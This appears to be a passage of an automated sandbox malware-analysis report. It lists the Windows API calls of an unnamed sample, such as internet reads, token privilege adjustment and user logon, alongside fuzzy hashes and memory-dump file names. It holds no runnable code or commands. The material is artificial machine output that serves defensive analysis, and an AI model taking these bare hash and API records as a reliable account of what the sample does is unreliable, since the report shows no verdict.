                                                                    • API String ID: 2576544623-0
                                                                    • Opcode ID: 8dbe9fac0a76723e2da0dbffde4137d2250cefefcb46ce9e14d2314c2dfb22fa
                                                                    • Instruction ID: 7a3144a45852bddffdbd2157446b66afb87c3e0227b25ec1240ba7db90f0a67f
                                                                    • Opcode Fuzzy Hash: 8dbe9fac0a76723e2da0dbffde4137d2250cefefcb46ce9e14d2314c2dfb22fa
                                                                    • Instruction Fuzzy Hash: 5C517BB1508301ABD320EF24DC81E6BB7E9EF84750F44482EF595972A1EB74E908DB92
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID:
                                                                    • API String ID: 3964851224-0
                                                                    • Opcode ID: 77420364da6cea1d486a3f53861121f8ddbe26db8dcd3417a7b0c66731c0284b
                                                                    • Instruction ID: d4ef04e444600d31430e827141073362f5d4344bec72871803f5d368b96d4529
                                                                    • Opcode Fuzzy Hash: 77420364da6cea1d486a3f53861121f8ddbe26db8dcd3417a7b0c66731c0284b
                                                                    • Instruction Fuzzy Hash: 14928171508381CFD720DF15C480B2AB7E1BF85314F14896DE98A9B362DBB9EC85DB92
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0102E628
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: ($|
                                                                    • API String ID: 1659193697-1631851259
                                                                    • Opcode ID: 3218906ae04237c8b60d4936964b992eb00af1068e29fc385052c7de2c54c47c
                                                                    • Instruction ID: 7a426954a07be8b3c23d5eefe1e51b7272e14680edc472abda852abcaa74233d
                                                                    • Opcode Fuzzy Hash: 3218906ae04237c8b60d4936964b992eb00af1068e29fc385052c7de2c54c47c
                                                                    • Instruction Fuzzy Hash: 44323775A407159FDB28CF19C4819AAB7F0FF48310B15C4AEE99ADB3A2D770E941CB40
                                                                    APIs
                                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0104180A,00000000), ref: 010423E1
                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 01042418
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                    • String ID:
                                                                    • API String ID: 599397726-0
                                                                    • Opcode ID: cf6bdbf56e7c631b84cef3944a68d9826ad00d94baa23d1245a2fe30bf2d6ea1
                                                                    • Instruction ID: 1b926e4df9211b6123c73aa1bc108d10282c6c500749f192addf23d1045ab83a
                                                                    • Opcode Fuzzy Hash: cf6bdbf56e7c631b84cef3944a68d9826ad00d94baa23d1245a2fe30bf2d6ea1
                                                                    • Instruction Fuzzy Hash: DF41A4B1A04209BFEB109E99ECC5EBFB7FCEB80715F00807AF781A6141DAB59E419650
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0103B343
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0103B39D
                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0103B3EA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                    • String ID:
                                                                    • API String ID: 1682464887-0
                                                                    • Opcode ID: 92977a4eb4a36396bf87323bf2e5f36c6e0ca1be3c359d5a1050c9ec6595bc5b
                                                                    • Instruction ID: bd6851435575aefeb1798e74af02ead1ba998216bc287b299cdc17219480ff68
                                                                    • Opcode Fuzzy Hash: 92977a4eb4a36396bf87323bf2e5f36c6e0ca1be3c359d5a1050c9ec6595bc5b
                                                                    • Instruction Fuzzy Hash: 64217135A00218EFCB00EFA5D880AEEFBB9FF49314F0480AAE945EB355CB359915DB51
                                                                    APIs
                                                                      • Part of subcall function 00FF0DB6: std::exception::exception.LIBCMT ref: 00FF0DEC
                                                                      • Part of subcall function 00FF0DB6: __CxxThrowException@8.LIBCMT ref: 00FF0E01
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0102882B
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01028858
                                                                    • GetLastError.KERNEL32 ref: 01028865
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 1922334811-0
                                                                    • Opcode ID: 484e28753a959cb8a4ddc72cf653fd1edfb1e3b3efd9a3fe248a183a56ddeef2
                                                                    • Instruction ID: ae7efa3b15e58490894ba9c3f0a02dff64789b7a8dd0a7c9daa7414e5b7f4ae1
                                                                    • Opcode Fuzzy Hash: 484e28753a959cb8a4ddc72cf653fd1edfb1e3b3efd9a3fe248a183a56ddeef2
                                                                    • Instruction Fuzzy Hash: FB119DB2804305AFE728DFA4EC85D6BB7E8EB04310B24C52EF49583251EB74B8008B60
                                                                    APIs
                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 01028774
                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0102878B
                                                                    • FreeSid.ADVAPI32(?), ref: 0102879B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                    • String ID:
                                                                    • API String ID: 3429775523-0
                                                                    • Opcode ID: 869cebc9c2b70708988e5deb585543d9fd08b3e574cc763d93e97b9cabcdbc57
                                                                    • Instruction ID: 193928c3ba55e00c6ad6a3354ec87e548d77a6ebaea82b09abf02809f9a5a632
                                                                    • Opcode Fuzzy Hash: 869cebc9c2b70708988e5deb585543d9fd08b3e574cc763d93e97b9cabcdbc57
                                                                    • Instruction Fuzzy Hash: 7DF04F7591130DBFDF04DFF4DC89AAEBBBCEF08211F0044A9A901E2180D6795A148B50
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0103C6FB
                                                                    • FindClose.KERNEL32(00000000), ref: 0103C72B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: 3584c64584beccf86aa8feb79cc1653401b312c50c892d206b445b3ca0fb4502
                                                                    • Instruction ID: a82dc891111c0640c7139f0f19b84f3ad69985c4154a6db42873b3062c1184f9
                                                                    • Opcode Fuzzy Hash: 3584c64584beccf86aa8feb79cc1653401b312c50c892d206b445b3ca0fb4502
                                                                    • Instruction Fuzzy Hash: B911A1726042009FDB10EF29C844A2EF7E9FF85320F04851EF9A9D7391DB74A801DB81
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,01049468,?,0105FB84,?), ref: 0103A097
                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,01049468,?,0105FB84,?), ref: 0103A0A9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFormatLastMessage
                                                                    • String ID:
                                                                    • API String ID: 3479602957-0
                                                                    • Opcode ID: 6f6d9fb9dcb09f5054fb75d80c993f10b7917e24c3798e1f137f59175367b1da
                                                                    • Instruction ID: 2f155e299cfed1dd6262fa1a1996a267f4283fcc5ebb015c777c378d81b6bf1b
                                                                    • Opcode Fuzzy Hash: 6f6d9fb9dcb09f5054fb75d80c993f10b7917e24c3798e1f137f59175367b1da
                                                                    • Instruction Fuzzy Hash: 7AF0823520532EABDB21AEA4CC48FEA776DBF08361F008156F989D7181D6359540CBA1
                                                                    APIs
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01028309), ref: 010281E0
                                                                    • CloseHandle.KERNEL32(?,?,01028309), ref: 010281F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                    • String ID:
                                                                    • API String ID: 81990902-0
                                                                    • Opcode ID: 9c30fca3019eb79bc74c9ab88f5a5b709f6733969cb2bc2222b5e68bf242f2fe
                                                                    • Instruction ID: 7e779a6b59f09d755479e4ed2ea6f5c196c8d0990543a32f18f3c493e6aea104
                                                                    • Opcode Fuzzy Hash: 9c30fca3019eb79bc74c9ab88f5a5b709f6733969cb2bc2222b5e68bf242f2fe
                                                                    • Instruction Fuzzy Hash: BBE0E671011611AFF7252B64EC05D777BEDEF04310714C85DF99584475DB665C90DB10
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FF8D57,?,?,?,00000001), ref: 00FFA15A
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FFA163
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 318e5d769ebef2fabf6f2dcf7acd6439551ce5aa07acfa46602aa1c59eb37445
                                                                    • Instruction ID: 9749f5e08931272b569c6de2ab0fafd139a1b32e9d08a42b93eb135f9ccc598e
                                                                    • Opcode Fuzzy Hash: 318e5d769ebef2fabf6f2dcf7acd6439551ce5aa07acfa46602aa1c59eb37445
                                                                    • Instruction Fuzzy Hash: EDB0923105430AABEB102F91E909B8A3F68EB44AA2F408010F64D84066CBEB54508B91
                                                                    Strings
                                                                    • Variable must be of type 'Object'., xrefs: 01013E62
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Variable must be of type 'Object'.
                                                                    • API String ID: 0-109567571
                                                                    • Opcode ID: 09be3aee09f8b42ddc846a3d5b887d519171ff95eaac605563e5e6dd9f4bcff3
                                                                    • Instruction ID: b948b917cc9ad034b5c71f5d1ee7a835e2491186ea4ffbc4f82e5c404dfbc5b8
                                                                    • Opcode Fuzzy Hash: 09be3aee09f8b42ddc846a3d5b887d519171ff95eaac605563e5e6dd9f4bcff3
                                                                    • Instruction Fuzzy Hash: BEA29B75E00205CBCB24EF58C490AAEB7B2FF58324F68805AD9469F355D739ED42EB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4ea8ad4a3954974332cafbfdcc9f2ead1e904a0e7d10cf53e3b751076275b8e2
                                                                    • Instruction ID: 180e4b29c517d128d659c7a0230612a5f79b0f1d89206e04b541820dc1e80c48
                                                                    • Opcode Fuzzy Hash: 4ea8ad4a3954974332cafbfdcc9f2ead1e904a0e7d10cf53e3b751076275b8e2
                                                                    • Instruction Fuzzy Hash: A932F032D29F054DD7339534C872336A248AFB73D8F15D737E95AB5ABAEB2984835200
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cfbfc5897fc5a961a4f6d83b3553d1658f836966d79ee44531c5b5a9f9bb8f73
                                                                    • Instruction ID: 6b99ee05ea5452482335d5ddc54ad36a382d71d72f00c0d8821559431f76c55c
                                                                    • Opcode Fuzzy Hash: cfbfc5897fc5a961a4f6d83b3553d1658f836966d79ee44531c5b5a9f9bb8f73
                                                                    • Instruction Fuzzy Hash: 94B12330E2AF508DD323A6398835336B64CAFBB2C5F51D71BFC9675D66EB2681834240
                                                                    APIs
                                                                    • __time64.LIBCMT ref: 0103889B
                                                                      • Part of subcall function 00FF520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01038F6E,00000000,?,?,?,?,0103911F,00000000,?), ref: 00FF5213
                                                                      • Part of subcall function 00FF520A: __aulldiv.LIBCMT ref: 00FF5233
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                    • String ID:
                                                                    • API String ID: 2893107130-0
                                                                    • Opcode ID: e93233c2c3a5f35b62692009e0af8d1e44d58cdf04d06fc933b28244144c8a74
                                                                    • Instruction ID: 6606e7ebb0c05823cdfc2393c175be00bca654c33767bd9cd54e916a25009ce1
                                                                    • Opcode Fuzzy Hash: e93233c2c3a5f35b62692009e0af8d1e44d58cdf04d06fc933b28244144c8a74
                                                                    • Instruction Fuzzy Hash: C721AF72625610CBC729CF29E451A52B3E5EFA5311F288FADE1F5CB2C0CA39A905CB54
                                                                    APIs
                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 01034C4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: mouse_event
                                                                    • String ID:
                                                                    • API String ID: 2434400541-0
                                                                    • Opcode ID: df4d2e6c4cbb2d744c5291c5a6fab7ffed33f9253cdd777b318ed2779518dabc
                                                                    • Instruction ID: 68018834b9c42555b6009b95b05c614085aefe23b8c69ad3b3726aa061aeb829
                                                                    • Opcode Fuzzy Hash: df4d2e6c4cbb2d744c5291c5a6fab7ffed33f9253cdd777b318ed2779518dabc
                                                                    • Instruction Fuzzy Hash: 91D017A517420E68F9EC0A259A2FF7A15CCE380686FC081896281CE1C1A88858408130
                                                                    APIs
                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,01028389), ref: 010287D1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: LogonUser
                                                                    • String ID:
                                                                    • API String ID: 1244722697-0
                                                                    • Opcode ID: 740e41591f62da0644e4ef90406150f6272cce94cc47cdbc3925aab39d1fecff
                                                                    • Instruction ID: eb3a0d6d38a6bc8177134d370b3a6fe214c429ece50c9e88f88ae1a16ebb245c
                                                                    • Opcode Fuzzy Hash: 740e41591f62da0644e4ef90406150f6272cce94cc47cdbc3925aab39d1fecff
                                                                    • Instruction Fuzzy Hash: DED05E3226060EABEF018EA4DC01EAF3B69EB04B01F408111FE15C5090C77AD835AF60
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FFA12A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 16a270f6e82e4bb2e7110b903f30630ef18944159b32d8b186cc9b585f24308a
                                                                    • Instruction ID: 3cd324821c728bfacab9b952046202fdaab9eac246179859342eedec31b16944
                                                                    • Opcode Fuzzy Hash: 16a270f6e82e4bb2e7110b903f30630ef18944159b32d8b186cc9b585f24308a
                                                                    • Instruction Fuzzy Hash: 12A0113000020EAB8B002E82E80888ABFACEA002A0B008020F80C800228BBBA8208A80
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 39ce2fee2afebd5557fbec474e87175a3559582bea3f9286cf8e6ac4bc8cdb3c
                                                                    • Instruction ID: bde707faa119f550a56ace1136f8282c6df34c257fcc07c5bcfdb4de4c507c8c
                                                                    • Opcode Fuzzy Hash: 39ce2fee2afebd5557fbec474e87175a3559582bea3f9286cf8e6ac4bc8cdb3c
                                                                    • Instruction Fuzzy Hash: 1D223A30D041E69BDF38AE1AC8947BC77A1FB01794F288076D9CACB592DB789D82D741
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
